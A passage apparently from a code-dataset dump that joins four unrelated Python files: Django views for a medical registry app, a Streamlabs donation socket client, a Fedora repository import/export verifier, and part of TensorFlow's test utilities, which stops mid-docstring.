DispensaryRegPlans.update_plan(request_data["card_pk"], request_data["researches_data_def"], request_data["researches_data"], request_data["year"])
return JsonResponse({"ok": True})
def update_screening_reg_plan(request):
request_data = json.loads(request.body)
ScreeningRegPlan.update_plan(request_data)
return JsonResponse({"ok": True})
def load_vaccine(request):
request_data = json.loads(request.body)
data = []
for a in VaccineReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "title": a.title, "series": a.series, "amount": a.amount, "method": a.method, "step": a.step, "tap": a.tap})
return JsonResponse({"rows": data})
def load_ambulatory_data(request):
request_data = json.loads(request.body)
data = []
for a in AmbulatoryData.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "data": a.data})
return JsonResponse({"rows": data})
def load_benefit(request):
request_data = json.loads(request.body)
data = []
for a in BenefitReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"benefit": str(a.benefit),
"registration_basis": a.registration_basis,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
}
)
return JsonResponse({"rows": data})
def load_dreg_detail(request):
a = DispensaryReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"diagnos": a.diagnos + ' ' + a.illnes,
"date_start": None if not a.date_start else a.date_start,
"date_end": None if not a.date_end else a.date_end,
"close": bool(a.date_end),
"why_stop": a.why_stop,
"time_index": a.what_times,
"identified_index": a.how_identified,
}
return JsonResponse(data)
def load_vaccine_detail(request):
a = VaccineReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"date": a.date,
"direction": a.direction,
"title": a.title,
"series": a.series,
"amount": a.amount,
"method": a.method,
"step": a.step,
"tap": a.tap,
"comment": a.comment,
}
return JsonResponse(data)
def load_ambulatory_data_detail(request):
a = AmbulatoryData.objects.get(pk=json.loads(request.body)["pk"])
str_adate = str(a.date)[0:7]
data = {
"date": str_adate,
"data": a.data,
}
return JsonResponse(data)
def load_ambulatory_history(request):
request_data = json.loads(request.body)
result = AmbulatoryDataHistory.objects.filter(card__pk=request_data["card_pk"]).order_by('-created_at')
rows = [{'date': strdate(i.created_at), 'data': i.text} for i in result]
return JsonResponse({"rows": rows})
def load_benefit_detail(request):
pk = json.loads(request.body)["card_pk"]
if pk > -1:
a = BenefitReg.objects.get(pk=pk)
data = {
"benefit_id": a.benefit_id,
"registration_basis": a.registration_basis,
"date_start": '' if not a.date_start else a.date_start,
"date_end": '' if not a.date_end else a.date_end,
"close": bool(a.date_end),
}
else:
data = {
"benefit_id": -1,
"registration_basis": "",
"date_start": '',
"date_end": '',
"close": False,
}
return JsonResponse(
{
"types": [{"pk": -1, "title": 'Не выбрано'}, *[{"pk": x.pk, "title": str(x)} for x in BenefitType.objects.filter(hide=False).order_by('pk')]],
**data,
}
)
@transaction.atomic
def save_dreg(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
create_disp_record = False
if pk == -1:
a = DispensaryReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
create_disp_record = True
else:
pk = rd["pk"]
a = DispensaryReg.objects.get(pk=pk)
Log.log(pk, 40000 if n else 40001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if (
not a.date_start
and d["date_start"]
or str(a.date_start) != fd(d["date_start"])
or a.spec_reg != request.user.doctorprofile.specialities
or a.doc_start_reg != request.user.doctorprofile
):
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
a.spec_reg = request.user.doctorprofile.specialities
c = True
if not a.date_end and d["close"] or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.why_stop = d["why_stop"]
a.doc_end_reg = request.user.doctorprofile
c = True
elif d["close"] and a.why_stop != d["why_stop"]:
a.why_stop = d["why_stop"]
c = True
if not d["close"] and (a.date_end or a.why_stop):
a.date_end = None
a.why_stop = ''
a.doc_end_reg = None
c = True
i = d["diagnos"].split(' ')
ds = i.pop(0)
if len(i) == 0:
i = ''
else:
i = ' '.join(i)
if a.diagnos != ds or a.illnes != i:
a.diagnos = ds
a.illnes = i
if create_disp_record:
disp_obj = DispensaryReg.objects.filter(card_id=rd["card_pk"], diagnos=ds, date_start=fd(d["date_start"]), doc_start_reg=request.user.doctorprofile)
if disp_obj.exists():
a.delete()
return JsonResponse({"ok": False, "pk": -1, "c": False})
c = True
if d.get('identified_index', 0) != a.how_identified:
a.how_identified = d.get('identified_index', 0)
c = True
if d.get('time_index', 0) != a.what_times:
a.what_times = d.get('time_index', 0)
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_vaccine(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
if pk == -1:
a = VaccineReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = VaccineReg.objects.get(pk=pk)
Log.log(pk, 70000 if n else 70001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(d["date"]):
a.date = fd(d["date"])
c = True
if a.direction != d["direction"]:
a.direction = d["direction"]
c = True
if a.title != d["title"]:
a.title = d["title"]
c = True
if a.series != d["series"]:
a.series = d["series"]
c = True
if a.amount != d["amount"]:
a.amount = d["amount"]
c = True
if a.step != d["step"]:
a.step = d["step"]
c = True
if a.tap != d["tap"]:
a.tap = d["tap"]
c = True
if a.comment != d["comment"]:
a.comment = d["comment"]
c = True
if a.method != d["method"]:
a.method = d["method"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_ambulatory_data(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
date_request = f"{d['date']}-01"
if pk == -1:
a = AmbulatoryData.objects.create(card_id=rd["card_pk"])
pk = a.pk
else:
pk = rd["pk"]
a = AmbulatoryData.objects.get(pk=pk)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(date_request):
a.date = fd(date_request)
c = True
if a.data != d["data"]:
a.data = d["data"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
AmbulatoryDataHistory.save_ambulatory_history(rd["card_pk"], request.user.doctorprofile)
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_benefit(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
c = False
if pk == -1:
a = BenefitReg.objects.create(card_id=rd["card_pk"], benefit_id=d["benefit_id"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = BenefitReg.objects.get(pk=pk)
if a.benefit_id != d["benefit_id"]:
a.benefit_id = d["benefit_id"]
c = True
Log.log(pk, 50000 if n else 50001, request.user.doctorprofile, {**rd, "data": {**{k: v for k, v in rd["data"].items() if k not in ['types']}}})
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if not a.date_start and d["date_start"] or str(a.date_start) != fd(d["date_start"]) or a.doc_start_reg != request.user.doctorprofile:
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
c = True
if a.registration_basis != d["registration_basis"]:
a.registration_basis = d["registration_basis"]
c = True
if not a.date_end and d["close"] or (d["close"] and a.doc_end_reg != request.user.doctorprofile) or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.doc_end_reg = request.user.doctorprofile
c = True
if not d["close"] and a.date_end:
a.date_end = None
a.doc_end_reg = None
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
def load_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
history = []
for a in AnamnesisHistory.objects.filter(card=card).order_by('-pk'):
history.append(
{
"pk": a.pk,
"text": a.text,
"who_save": {
"fio": a.who_save.get_fio(dots=True),
"department": a.who_save.podrazdeleniye.get_title(),
},
"datetime": a.created_at.astimezone(pytz.timezone(settings.TIME_ZONE)).strftime("%d.%m.%Y %X"),
}
)
data = {
"text": card.anamnesis_of_life,
"history": history,
}
return JsonResponse(data)
def save_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
if card.anamnesis_of_life != request_data["text"]:
card.anamnesis_of_life = request_data["text"]
card.save()
AnamnesisHistory(card=card, text=request_data["text"], who_save=request.user.doctorprofile).save()
return JsonResponse({"ok": True})
def create_l2_individual_from_card(request):
request_data = json.loads(request.body)
polis = request_data['polis']
has_tfoms_data = False
if SettingManager.l2('tfoms'):
from_tfoms = match_enp(polis)
if from_tfoms:
has_tfoms_data = True
Individual.import_from_tfoms(from_tfoms, no_update=True)
if not has_tfoms_data:
Individual.import_from_tfoms(
{
"enp": polis,
"family": request_data['family'],
"given": request_data['name'],
"patronymic": request_data['patronymic'],
"gender": request_data['sex'],
"birthdate": request_data['bdate'],
},
no_update=True,
)
return JsonResponse({"ok": True})
def is_l2_card(request):
request_data = json.loads(request.body)
card = Card.objects.filter(number=request_data['number'], base__internal_type=True).first()
if card:
return JsonResponse({"ok": True, "individual_fio": card.individual.fio()})
else:
return JsonResponse({"ok": False})
|
streamlabs.py
|
import logging
import threading
import socketio
from pajbot.managers.handler import HandlerManager
from pajbot.managers.db import DBManager
from pajbot.models.user import User
from currency_converter import CurrencyConverter
log = logging.getLogger(__name__)
class StreamLabsNameSpace(socketio.ClientNamespace):
def on_connect(self):
log.info("Connected to Streamlabs, Wait for Events")
def on_event(self, data):
if data["type"] == "donation":
sub_data = data["message"][0]
amount = float(str(sub_data["amount"]))
username = str(sub_data["from"])
currency = str(sub_data["currency"])
c = CurrencyConverter()
log.info(username)
amount = round(c.convert(amount, currency, "USD"), 2)
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if user is not None:
log.info(f"User {user} donated ${amount}")
HandlerManager.trigger("on_donate", user=user, amount=amount)
if "message" in data and "event" in data["message"]:
if data["message"]["event"] == "play":
if data["message"]["media"] is None: # no new song
HandlerManager.trigger("resume_spotify")
else: # a new song
username = data["message"]["media"]["action_by"]
title = data["message"]["media"]["media_title"]
HandlerManager.trigger("pause_spotify", requestor=username, title=title)
elif data["message"]["event"] == "updateControls": # On play or pause on streamlabs
HandlerManager.trigger("change_state", state=not data["message"]["controls"]["play"])
def on_disconnect(self):
log.error("Disconnected from steam elements")
HandlerManager.trigger("streamlabs_reconnect")
class StreamLabsManager:
def __init__(self, socket_access_token):
self.socket_access_token = socket_access_token
self.sio = socketio.Client()
self.sio.register_namespace(StreamLabsNameSpace(""))
HandlerManager.add_handler("streamlabs_reconnect", self.setupThread)
self.mainThread = None
self.setupThread()
def setupThread(self):
if self.mainThread is not None:
self.mainThread.stop()
self.mainThread = threading.Thread(target=self.connect)
self.mainThread.daemon = True
self.mainThread.start()
def connect(self):
self.sio.connect("https://sockets.streamlabs.com?token=" + self.socket_access_token)
|
verifier.py
|
from csv import DictWriter
import os
import datetime
import sys
import time
import threading
import traceback
from rdflib.compare import isomorphic
from rdflib import Graph
from bagit import Bag
from .constants import EXT_BINARY_EXTERNAL
from .iterators import FcrepoWalker, LocalWalker
from .resources import FedoraResource, LocalResource
from .model import Repository
class FedoraImportExportVerifier:
"""Contains logic for performing a verification."""
def __init__(self, config, loggers):
self.config = config
self.loggers = loggers
def verify_bag(self):
"""Verifies the structure of the bag"""
console = self.loggers.console
console.info("Verifying bag...")
bag = Bag(self.config.dir)
if bag.is_valid():
console.info("bag is valid :)")
else:
console.info("bag is invalid :(")
def execute(self):
"""Executes the verification process."""
config = self.config
output_dir = self.config.output_dir
loggers = self.loggers
logger = loggers.file_only
console = loggers.console
console_only = loggers.console_only
# Check the repository connection
repo = Repository(config, loggers)
console.info("Testing connection to {0}...".format(repo.base))
if repo.is_reachable():
console.info("Connection successful.")
else:
console.error(
"Connection to {0} failed. Exiting.".format(repo.base)
)
sys.exit(1)
# Set up csv file, if specified
os.makedirs(output_dir, exist_ok=True)
datestr = datetime.datetime.today().strftime('%Y%m%d-%H%M')
csvfilename = "{0}/report-{1}.csv".format(output_dir, datestr)
csvfile = open(csvfilename, "w")
fieldnames = ["number", "type", "original", "destination",
"verified",
"verification"]
writer = DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
console.info("Starting verification...")
if config.mode == "export":
tree = FcrepoWalker(config, logger)
elif config.mode == "import":
tree = LocalWalker(config, logger)
console.info(
"Running verification on Fedora 4 {0}".format(config.mode)
)
if config.bag:
self.verify_bag()
console.info("Commencing resource verification...")
success_count = 0
failure_count = 0
def total_count():
return success_count + failure_count
def log_summary(logger):
logger.info(
"Verified {} resources: successes = {}, failures = {}".format(
total_count(), success_count, failure_count)
)
def count_logger():
while(True):
time.sleep(10)
log_summary(console_only)
t = threading.Thread(target=count_logger)
t.daemon = True
t.start()
# Step through the tree and verify resources
for filepath in tree:
# iterator can return None, in which case skip
if filepath is not None:
try:
# path begins with repository base = fedora resource
if filepath.startswith(config.repobase):
original = FedoraResource(filepath, config, logger,
console)
if not original.is_reachable:
verified = False
verification = "original not reachable"
# path begins with local root dir = local resource
elif filepath.startswith(config.dir):
original = LocalResource(filepath, config, logger,
console)
# any other path indicates an error
else:
# TODO: Consider handling this error and continuing
logger.error(
"Resource in unexpected location."
)
sys.exit(1)
# if binaries not included in export
if not config.bin:
# skip binaries and fcr:metadata
if original.type == "binary" or \
original.origpath.endswith("/fcr:metadata"):
continue
# filter refs to binary resources from rdf resources
else:
original.filter_binary_refs()
# create object representing destination resource
if filepath.startswith(config.repobase):
destination = LocalResource(original.destpath,
config,
loggers.file_only,
loggers.console)
elif filepath.startswith(config.dir):
destination = FedoraResource(original.destpath,
config,
loggers.file_only,
loggers.console)
# analyze the resource type
if original.type == "binary":
if destination.origpath.endswith(EXT_BINARY_EXTERNAL):
if not self.config.external:
continue
if original.sha1 == destination.sha1:
verified = True
verification = original.sha1
else:
verified = False
verification = "{0} != {1}".format(
original.sha1, destination.sha1
)
elif original.type == "rdf":
# if legacyMode is set, filter graph on import
if config.legacyMode:
if config.mode == "export":
pass
elif config.mode == "import":
to_filter = destination.server_managed
for p in to_filter.predicates():
original.graph.remove(
Graph().triples((None, p, None))
)
destination.graph = destination.minimal
# compare the original and destination graphs
if isomorphic(original.graph, destination.graph):
verified = True
verification = \
"{0} triples".format(len(original.graph))
else:
verified = False
verification = ("{0}+{1} triples - mismatch"
.format(
len(original.graph),
len(destination.graph)
))
logger.info(
"RESOURCE {0}: {1} {2}".format(
total_count(), original.location, original.type)
)
except Exception as ex:
traceback.print_exc()
verified = False
verification = ("Object could not be verified: {"
"0}".format(ex))
if not verified:
logger.warn(
"Resource Mismatch \"{}\"".format(original.relpath)
)
failure_count += 1
else:
success_count += 1
if config.verbose:
logger.info(" rel => {}".format(original.relpath))
logger.info(" orig => {}".format(original.origpath))
logger.info(" dest => {}".format(original.destpath))
logger_method = logger.info
if not verified:
logger_method = logger.warn
logger_method(
" Verified original to copy... {0} -- {1}".format(
verified, verification)
)
# write csv if exists
row = {"number": str(total_count()),
"type": original.type,
"original": original.origpath,
"destination": original.destpath,
"verified": str(verified),
"verification": verification}
writer.writerow(row)
log_summary(console)
console.info("Verification complete")
csvfile.close()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
